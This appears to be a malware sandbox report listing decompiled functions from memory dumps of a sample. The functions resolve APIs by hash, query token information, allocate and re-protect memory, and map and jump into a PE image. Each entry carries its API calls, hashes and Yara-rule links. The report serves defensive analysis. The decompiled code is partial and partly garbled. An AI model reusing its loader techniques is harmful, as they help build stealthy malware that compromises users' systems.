					if( *(_t429 + 0x1a0) != 0) {
						E6F50F584(_t429 + 0x3c, _t262);
						_t265 = E6F51306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6F50F654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6F50F4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6F50F4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6F5135F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6F50F4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6F51306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6F5135F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6F510FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6F51306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6F510FD4(_t403, _t413, _t403);
								}
								E6F50F654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6F50BB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6F50BB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6f51073f
0x6f510741
0x6f510748
0x6f510fc7
0x6f510fcd
0x6f510fcd
0x6f510752
0x6f51075e
0x6f51076a
0x6f51076f
0x6f51077c
0x6f51078d
0x6f51078f
0x6f510790
0x6f510791
0x6f510791
0x6f510792
0x6f510796
0x6f51079a
0x6f51079f
0x6f5107a2
0x6f5107a8
0x6f5107c2
0x6f5107c9
0x6f5107cc
0x6f5107cf
0x6f5107d1
0x6f5107dd
0x6f5107ea
0x6f5107f7
0x6f5107fb
0x6f510887
0x6f510887
0x6f510889
0x6f51088d
0x6f510898
0x6f5108ae
0x6f5108b1
0x6f5108b1
0x6f5108b5
0x6f5108be
0x6f5108c3
0x6f5108c3
0x6f5108c5
0x6f5108d6
0x6f5108f8
0x6f5108fa
0x6f5108fb
0x6f5108ff
0x6f5108ff
0x6f510908
0x6f510914
0x6f51091d
0x6f510933
0x6f510943
0x6f510948
0x6f51094c
0x6f510951
0x6f510953
0x6f5109a3
0x6f5109b8
0x6f5109bc
0x6f5109c1
0x6f5109d2
0x6f5109e7
0x6f5109eb
0x6f5109f0
0x6f5109f2
0x6f510a39
0x6f510a3c
0x6f510a8a
0x6f510a8d
0x6f510ace
0x6f510ad2
0x6f510ad7
0x6f510adc
0x6f510afb
0x6f510afb
0x6f510afb
0x6f510afd
0x00000000
0x6f510afd
0x6f510ade
0x6f510ae2
0x6f510ae4
0x6f510aeb
0x6f510aeb
0x6f510af1
0x6f510af1
0x6f510af3
0x6f510af6
0x6f510af6
0x00000000
0x6f510af3
0x6f510ae6
0x6f510ae9
0x6f510aef
0x6f510aef
0x00000000
0x6f510aef
0x00000000
0x6f510ae9
0x6f510a8f
0x6f510a92
0x00000000
0x00000000
0x6f510a98
0x6f510a9d
0x6f510aa2
0x6f510ac1
0x6f510ac1
0x6f510acb
0x00000000
0x6f510acb
0x6f510aa4
0x6f510aa8
0x6f510aaa
0x6f510ab1
0x6f510ab1
0x6f510ab7
0x6f510ab7
0x6f510ab9
0x6f510abc
0x6f510abc
0x00000000
0x6f510ab9
0x6f510aac
0x6f510aaf
0x6f510ab5
0x6f510ab5
0x00000000
0x6f510ab5
0x00000000
0x6f510aaf
0x6f510a3e
0x6f510a40
0x6f510a7f
0x6f510a82
0x6f510df4
0x6f510df9
0x6f510dfe
0x6f510e1d
0x6f510e1d
0x6f510e27
0x00000000
0x6f510e27
0x6f510e00
0x6f510e04
0x6f510e06
0x6f510e0d
0x6f510e0d
0x6f510e13
0x6f510e13
0x6f510e15
0x6f510e18
0x6f510e18
0x00000000
0x6f510e15
0x6f510e08
0x6f510e0b
0x6f510e11
0x6f510e11
0x00000000
0x6f510e11
0x00000000
0x6f510e0b
0x00000000
0x6f510a88
0x6f510a46
0x6f510a4b
0x6f510a50
0x6f510a6f
0x6f510a6f
0x6f510a79
0x00000000
0x6f510a79
0x6f510a52
0x6f510a56
0x6f510a58
0x6f510a5f
0x6f510a5f
0x6f510a65
0x6f510a65
0x6f510a67
0x6f510a6a
0x6f510a6a
0x00000000
0x6f510a67
0x6f510a5a
0x6f510a5d
0x6f510a63
0x6f510a63
0x00000000
0x6f510a63
0x00000000
0x6f510a5d
0x6f5109f4
0x6f5109f6
0x00000000
0x00000000
0x6f510a00
0x6f510a05
0x6f510a0a
0x6f510a29
0x6f510a29
0x6f510a33
0x00000000
0x6f510a33
0x6f510a0c
0x6f510a10
0x6f510a12
0x6f510a19
0x6f510a19
0x6f510a1f
0x6f510a1f
0x6f510a21
0x6f510a24
0x6f510a24
0x00000000
0x6f510a21
0x6f510a14
0x6f510a17
0x6f510a1d
0x6f510a1d
0x00000000
0x6f510a1d
0x00000000
0x6f510a17
0x6f510959
0x6f51095e
0x6f510963
0x6f510982
0x6f510982
0x6f51098c
0x00000000
0x6f51098c
0x6f510965
0x6f510969
0x6f51096b
0x6f510972
0x6f510972
0x6f510978
0x6f510978
0x6f51097a
0x6f51097d
0x6f51097d
0x00000000
0x6f51097a
0x6f51096d
0x6f510970
0x6f510976
0x6f510976
0x00000000
0x6f510976
0x00000000
0x6f51089a
0x6f51089c
0x6f510b01
0x6f510b06
0x6f510b09
0x6f510b0e
0x6f510b10
0x6f510b25
0x6f510b28
0x6f510bf6
0x6f510bfe
0x6f510c01
0x6f510c16
0x6f510c20
0x6f510c20
0x6f510c22
0x6f510c24
0x6f510c33
0x6f510c3f
0x6f510c43
0x6f510c46
0x6f510c49
0x6f510c4c
0x00000000
0x6f510c4c
0x6f510b38
0x6f510b4a
0x6f510b4e
0x6f510bda
0x6f510bda
0x6f510be0
0x6f510beb
0x6f510be2
0x6f510be2
0x6f510be2
0x00000000
0x6f510be0
0x6f510b5b
0x6f510b5c
0x6f510b5e
0x6f510b64
0x6f510fb3
0x6f510fb8
0x6f510fba
0x00000000
0x00000000
0x6f510fc0
0x6f510b7b
0x6f510b7f
0x6f510b84
0x6f510b96
0x6f510b9a
0x6f510ba5
0x6f510ba6
0x6f510ba7
0x6f510ba8
0x6f510baa
0x6f510bb5
0x6f510e2d
0x6f510e2d
0x6f510bb5
0x6f510bbb
0x6f510bc4
0x6f510e3f
0x6f510e55
0x6f510e57
0x6f510e59
0x6f510f94
0x6f510f9b
0x00000000
0x6f510f9b
0x6f510e68
0x6f510e76
0x6f510e90
0x6f510e92
0x6f510e94
0x6f510fa5
0x6f510faa
0x6f510fac
0x00000000
0x00000000
0x6f510fae
0x6f510ea8
0x6f510eb3
0x6f510ec2
0x6f510ed4
0x6f510ed6
0x6f510ed8
0x6f510ee5
0x6f510ee5
0x6f510ef5
0x6f510f06
0x6f510f0b
0x6f510f0d
0x6f510f0f
0x6f510f16
0x6f510f17
0x6f510f17
0x6f510f23
0x6f510f44
0x6f510f4d
0x6f510f59
0x6f510f65
0x6f510f6a
0x6f510f6f
0x6f510f75
0x6f510f75
0x6f510f7a
0x6f510f80
0x00000000
0x6f510f86
0x6f510f88
0x00000000
0x6f510f88
0x6f510bca
0x6f510bca
0x6f510bcf
0x6f510bd5
0x6f510bd5
0x00000000
0x6f510bcf
0x6f510bc4
0x6f510898
0x6f510808
0x6f510809
0x6f51080b
0x6f510811
0x6f510dde
0x6f510de3
0x6f510de5
0x00000000
0x00000000
0x6f510deb
0x6f510828
0x6f51082c
0x6f510831
0x6f510847
0x6f51085e
0x6f510862
0x6f510c5a
0x6f510c5a
0x6f510862
0x6f510868
0x6f510871
0x6f510c69
0x6f510c7a
0x6f510c7f
0x6f510c81
0x6f510c83
0x6f510db4
0x6f510db8
0x00000000
0x6f510db8
0x6f510c8f
0x6f510cb4
0x6f510cb6
0x6f510cb8
0x6f510dd0
0x6f510dd5
0x6f510dd7
0x00000000
0x00000000
0x6f510dd9
0x6f510cc9
0x6f510cd7
0x6f510cde
0x6f510cdf
0x6f510ce0
0x6f510cf2
0x6f510cf4
0x6f510cf6
0x00000000
0x00000000
0x6f510cfe
0x6f510d19
0x6f510d1b
0x6f510d1d
0x6f510dc2
0x6f510dc7
0x6f510dc9
0x00000000
0x00000000
0x6f510dcb
0x6f510d23
0x6f510d2a
0x6f510d2e
0x6f510d99
0x6f510d99
0x6f510d9b
0x6f510da2
0x6f510da2
0x6f510da8
0x6f510da8
0x6f510daa
0x6f510daf
0x6f510daf
0x00000000
0x6f510daa
0x6f510d9d
0x6f510da0
0x6f510da6
0x6f510da6
0x00000000
0x6f510da6
0x00000000
0x6f510da0
0x6f510d30
0x6f510d30
0x6f510d32
0x6f510d3e
0x6f510d43
0x6f510d45
0x00000000
0x00000000
0x6f510d47
0x6f510d4b
0x6f510d52
0x6f510d53
0x6f510d54
0x6f510d56
0x00000000
0x00000000
0x6f510d58
0x6f510d5a
0x6f510d61
0x6f510d61
0x6f510d67
0x6f510d67
0x6f510d69
0x6f510d6e
0x6f510d6e
0x6f510d77
0x6f510d7c
0x6f510d81
0x6f510d87
0x6f510d87
0x6f510d8c
0x00000000
0x6f510d8c
0x6f510d5c
0x6f510d5f
0x6f510d65
0x6f510d65
0x00000000
0x6f510d65
0x00000000
0x6f510d93
0x6f510d93
0x6f510d94
0x6f510d94
0x00000000
0x6f510d32
0x6f510877
0x6f51087c
0x6f510882
0x6f510882
0x00000000
0x6f510c59
0x6f510c59
0x6f510c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6F51085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6F510C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6F510CB4

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 852599a4ae03c16b27b7d410a857c00cba605efba6707ddb4e6fd598ea73fdc6
Instruction ID: b7c6bd5ca9398eb768942646906a863cd24b3d738613dcff561a8a8c345de862
Opcode Fuzzy Hash: 852599a4ae03c16b27b7d410a857c00cba605efba6707ddb4e6fd598ea73fdc6
Instruction Fuzzy Hash: DA22A37160C341ABFB20EA24C990BDF77A5AFC2708F10993AA8959B191DB31FC55CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6F512234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6F512234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6F513AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6F51306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6f512234
0x6f512238
0x6f512254
0x6f512257
0x6f51223a
0x6f512249
0x6f51224c
0x6f51224c
0x6f512267
0x6f51226c
0x6f512270
0x6f512278
0x6f512278
0x6f51227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6F504B17,00000000,00000000,?), ref: 6F512278

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: abda8ac7cb68cf117834e7fdbb750df058a3a3921ecfeddc69d8f79aabfef1fe
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: DCE065B050E301AEFB44D6288C01B6F36D9AFC5710F208A3DB468D61C4F770AC018761

Uniqueness

Uniqueness Score: -1.00%

Function 6F512820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F512820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6F51306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6f512827
0x6f512830
0x6f51283e
0x6f512861
0x6f512861
0x6f512840
0x6f512857
0x6f51285b
0x00000000
0x6f51285d
0x6f51285d
0x6f51285d
0x6f51285b
0x6f512866

APIs

NtAllocateVirtualMemory.NTDLL(6F5188E6,?,00000000,000000FF,6F5188E6,6F5188E6,60A28C5C,60A28C5C,?,?,6F5188E6,00003000,00000004,000000FF), ref: 6F512857

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: b58642ffff8922c02677e194191ad77ba91d03abb8120e531a653394af439bee
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: BAE0157120D342ABFB08CA298C10EABBAE9EF85604F108C2DB49486250D720EC00D721

Uniqueness

Uniqueness Score: -1.00%

Function 6F513138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6F513138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6F5134B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6f513138
0x6f51313d
0x6f51313f
0x6f513141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6F5134B0,6F513128,60A28C5C,60A28C5C,?,6F506C99,00000000), ref: 6F51313F

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: a97187c992c5376f665368342bc5bbbe051626f59442f9fb7422d7de6ea56241
Instruction ID: db7c2a6cfcff4e697e6821e45f7d53e1a769f5928f0143f7dfeee38f6c52f39d
Opcode Fuzzy Hash: a97187c992c5376f665368342bc5bbbe051626f59442f9fb7422d7de6ea56241
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01582092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E01582092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0x1584418 = 1;
				asm("movaps xmm0, [0x1583010]");
				asm("movups [0x1584428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E01581770();
				E015817BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E01581770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0x1584418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E01581770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x0158209e
0x015820ac
0x015820b3
0x015820b6
0x015820c0
0x015820c7
0x015820d1
0x015820d7
0x015820e0
0x015820e9
0x015820ec
0x015820f0
0x015820f8
0x015820ff
0x01582102
0x01582105
0x01582108
0x0158210b
0x01582125
0x0158212b
0x0158212e
0x01582136
0x0158213a
0x0158213d
0x01582140
0x01582143
0x01582146
0x01582162
0x0158217f
0x015821a4
0x015821a6
0x015821af
0x015821b2
0x015821bc
0x015821bf
0x015821c2
0x015821c5
0x015821c8
0x01582216
0x01582216
0x01582249
0x0158224c
0x0158225c
0x0158225f
0x015822a8
0x015822a8
0x015822b7
0x015822bf
0x015822cd
0x015822dc
0x0158230d
0x01582316
0x0158231a
0x0158231e
0x01582325
0x0158232b
0x0158232d
0x01582336
0x01582347
0x0158234d
0x01582350
0x01582353
0x00000000
0x00000000
0x01582359
0x015822a8
0x01582264
0x01582272
0x0158227a
0x0158227d
0x0158227f
0x01582285
0x01582291
0x01582297
0x0158229a
0x0158229d
0x015821f9
0x015821f9
0x0158236e
0x01582374
0x01582379
0x0158237f
0x01582385
0x0158238b
0x01582391
0x01582394
0x01582397
0x0158239f
0x015823a7
0x015823ad
0x015823b3
0x015823b9
0x015823bf
0x015823cd
0x015821da
0x015821e0
0x015821e0
0x01582234

APIs

VirtualProtect.KERNELBASE ref: 0158210B
VirtualProtect.KERNELBASE ref: 015821A4
VirtualProtect.KERNELBASE ref: 0158232B

Strings

`, xrefs: 0158239F

Memory Dump Source

Source File: 00000001.00000002.738035827.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: fe3147720ee4889cf0bd134dcfcd638e0d9dabca1cb486b28ce270fa02b7cc71
Instruction ID: 3441abc44c9ad6b82ab3fd27d7eea164f5e2425dbcec63ce1fb61b2233138514
Opcode Fuzzy Hash: fe3147720ee4889cf0bd134dcfcd638e0d9dabca1cb486b28ce270fa02b7cc71
Instruction Fuzzy Hash: 4DB1CDB4E00219CFDB14DFA9C880A9DBBF1BF88304F15856AE959AB351D730A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6F515E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F515E84(void* __ecx, void* __eflags, void* _a4, char _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6F50C280(_t19) == 0) {
					_t2 =  &_a8; // 0x6f515d79
					_v12 =  *_t2;
					if(E6F513064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6F5135F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6f515e87
0x6f515e89
0x6f515e95
0x6f515e9b
0x6f515e9f
0x6f515eb5
0x6f515ed4
0x6f515eb7
0x6f515ec8
0x6f515ecc
0x6f515eec
0x6f515ece
0x6f515ece
0x6f515ece
0x6f515ecc
0x6f515ed5
0x6f515eda
0x6f515ee3
0x6f515edc
0x6f515edc
0x6f515ede
0x6f515ede
0x6f515e97
0x6f515e97
0x6f515e97
0x6f515ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6F515D79,00000000,?,00000000,?), ref: 6F515EC8

Strings

y]Qo, xrefs: 6F515E9B

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID: y]Qo
API String ID: 2738559852-767204661
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: aafb66f9553bbd6e76f56837fd695719691da5040c946958872b20d0cd01de4f
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: BCF06D3565C306ABFB51EA3C9E00AAB77D5EB49350F104E7AA895C2280EB32FC44C621

Uniqueness

Uniqueness Score: -1.00%

Function 6F5110A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6F5110A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6F51306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6F50C280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6F50BB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6F51306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6F50F584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6F50F4BC(_t59, 0);
					_t34 = E6F51306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6f5110b3
0x6f5110b5
0x6f5110c4
0x6f5110c8
0x6f5110d2
0x6f5110d2
0x6f5110d8
0x6f5110db
0x6f5110dd
0x6f5110e8
0x6f511122
0x6f511127
0x6f51112c
